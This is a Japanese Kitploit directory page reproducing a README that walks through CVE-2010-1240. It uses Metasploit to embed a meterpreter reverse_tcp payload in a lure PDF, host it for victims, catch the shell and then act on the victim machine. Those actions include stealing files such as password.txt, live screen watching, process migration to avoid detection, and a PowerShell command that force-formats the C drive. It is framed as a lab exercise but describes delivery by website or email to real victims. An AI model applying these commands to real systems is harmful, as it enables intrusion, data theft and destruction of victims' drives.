Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Embedded-PDF — このデモンストレーションビデオは、実際には埋め込まれたペイロードで構成されている一見無害なPDFファイルを標的に送信することで、被害者のデバイスを制御する方法を示しています。このエクスプロイトはCVE-2010-1240として公開されました。 | Kitploit
ツール/GitHubGitHub/jasmoon99/embedded-pdf
フィッシングツールペイロード生成エクスプロイトポストエクスプロイトペネトレーションテストコマンド&コントロールソーシャルエンジニアリング学習と教育リモートアクセスツール
GitHubjasmoon99/embedded-pdf

Embedded-PDF

このデモンストレーションビデオは、実際には埋め込まれたペイロードで構成されている一見無害なPDFファイルを標的に送信することで、被害者のデバイスを制御する方法を示しています。このエクスプロイトはCVE-2010-1240として公開されました。

7165年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

PDFファイルを介した埋め込みバックドア接続 😈

提供    

はじめに

このデモンストレーションビデオでは、一見無害に見えるPDFファイル(実際には埋め込みペイロードが含まれています)をターゲットに送信することで、被害者のデバイスを制御できる方法を示しています。このエクスプロイトはCVE-2010-1240として公開されました。

PDFがAdobe Readerで開かれるとすぐに、セキュリティのポップアップに同意するよう私たちに騙されたユーザーは、リバースTCP接続を介して自分のデバイスに接続されたmeterpreterセッションを私たちに取得させてしまうことになります。その時点で、彼らのすべてのデータと現在行っていることはすべて私たちの監視下に置かれます。

Hehe~Boi

ソフトウェア/ツールの一覧

  • Metasploit
  • Adobe Reader <= 8.1.2

環境

Kali Linux         Windows 7 or 10         Adobe Reader        

  • 攻撃マシン: Kali Linux バージョン 2021.1
  • ターゲットOS: Windows 10 (x86) または Windows 7 (x86)
  • ターゲットソフトウェア: Adobe Reader 8.1.2

詳細な手順

まず、Metasploitフレームワークにアクセスするためのコマンドラインインターフェースを提供するMSFconsoleを起動します。

root@kitploit:~
msfconsole

次に、ターゲットのWindowsプラットフォームとAdobe PDF Readerに一致するエクスプロイトを検索します。すると、被害者のWindowsマシンを乗っ取り、Adobe PDF Readerの脆弱性を悪用するために使用できるエクスプロイトの全一覧が表示されます。

root@kitploit:~
search type:exploit platform:windows adobe pdf

この悪用では、以下のコマンドを使用して「adobe_pdf_embedded_exe」モジュールを選択・使用し、被害者を乗っ取るという目標を達成します。

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

また、以下のように「info」コマンドを使用してエクスプロイトの情報を確認することもできます:

root@kitploit:~
info

次に、リバースTCP接続を使用するようにペイロードを設定します。また、対話型シェルを提供するMeterpreterも使用します。これにより、コードを挿入・実行して被害者のマシンを調査するためのあらゆる機能を簡単に使用できます。

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

次に、リスニングホストとポートを設定します。LHOSTには攻撃マシンのIPアドレス、つまりこの場合はKaliマシンのIPアドレス(10.0.2.4)* を入力する必要があります。

  • *追記*
    • ご自身のKaliマシンのIPを使用する必要があります
    • 別のポート番号を使用することもできます

一方、LPORTにはあまり一般的に使用されていないポート番号を自由に設定できます。

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

次に、INFILENAME*フラグを使用してPDFのベースとなる入力ファイルを設定します。続いて、被害者が悪意のあるPDFファイルを開きたくなるようなファイル名を設定します。

  • *追記*
    • PDFファイルのパスを確認する必要があります
    • 別のファイル名を使用することもできます
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

PDFと一緒にペイロードを生成するために「exploit」コマンドを入力する前に、オプションをもう一度確認できます。

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

PDFファイルの生成が完了したら、ファイルを/var/www/htmlに移動します。これはKaliマシンのディレクトリで、後で被害者がPDFファイルをダウンロードできるようにWebアプリケーションサーバーをホストするためのものです。

  • 注記:
    • 別のファイル名を設定した場合は、正しいパスをコピーしていることを確認してください!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

次に、リスナーを設定するために「exploit/multi/handler」を使用します。ここでも、悪意のあるPDFファイルの生成時に定義したものと一致するようにペイロード、LHOST、LPORTを設定します。その後、ペイロードを実行します。

  • 注記:
    • LHOST: ご自身のKaliマシンのIPアドレスに注意してください
    • LPORT: 別のポート番号を設定した場合は、番号を正しく入力していることを確認してください
    • show info または show options は任意のコマンドです。
      • 実行するのは、今設定した内容を確認するためだけです
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

別のターミナルで、Apacheサーバーのステータスを確認して、被害者がファイルをダウンロードできるように/var/www/htmlでPDFファイルをホストするために実行中であることを確認します。

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Windowsマシンで、Chromeブラウザなどの任意のブラウザを開き、KaliマシンのIP(10.0.2.4)* を入力してKaliマシンのWebアプリケーションサーバーにアクセスします。

*注記: ご自身のKaliマシンのIPアドレスに注意してください

次に、ユーザーを模倣して目的のPDFファイルを保存します。

被害者がAdobe Reader 8.1.2でファイルを開き、表示されるセキュリティメッセージに同意すると、Kaliマシン上でリバースTCP接続を介して接続された新しいセッションを確認できます。

実際のシナリオでは、 埋め込みペイロードを含むPDFを配置したWebサイトを用意し、被害者にファイルをダウンロードさせたり、メールでファイルを添付させたりします。


エクスプロイトの結果

その後、被害者のマシンにリモートでアクセスし、meterpreterセッション内で実行したいさらに多くの悪意のある動作を実行できます。

実行できることの一覧を表示

root@kitploit:~
help

現在のディレクトリを一覧表示

root@kitploit:~
pwd

そのディレクトリ内のファイルを一覧表示

root@kitploit:~
ls

被害者のマシンからフォルダまたはファイルをダウンロード

例えば、password.txtという名前のファイルがある場合、download password.txtコマンドを発行できます。

root@kitploit:~
download [folder name | filename with extension]

被害者のマシンにファイルを作成

もちろん、本当に邪悪なら、私たちがWindowsマシンに接続し続けるための悪意のあるスクリプト(バックドアの埋め込み)を作成することもできます! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Windowsとの対話

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

追加情報

ただし、攻撃者はmeterpreterセッションのmigrateモジュールを使用してmeterpreterプロセスを別のプロセスに移行することで、疑念を軽減できます。

root@kitploit:~
meterpreter> run post/windows/manage/migrate

ここでは、移行先となる新しいプロセスが被害者のマシンに自動的に生成されます。被害者はその後、感染したPDFファイルを削除することもできますが、プロセスがすでに別の場所に移っていることにはまったく気づいていません。

攻撃者はさらに、コマンドプロンプト(cmd)またはPowerShellを使用してターゲットマシン上に悪意のあるスクリプトを作成し、オペレーティングシステム全体を正常に機能しない状態に陥らせることができます。

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

デモンストレーションビデオ

デモ

ツールをダウンロード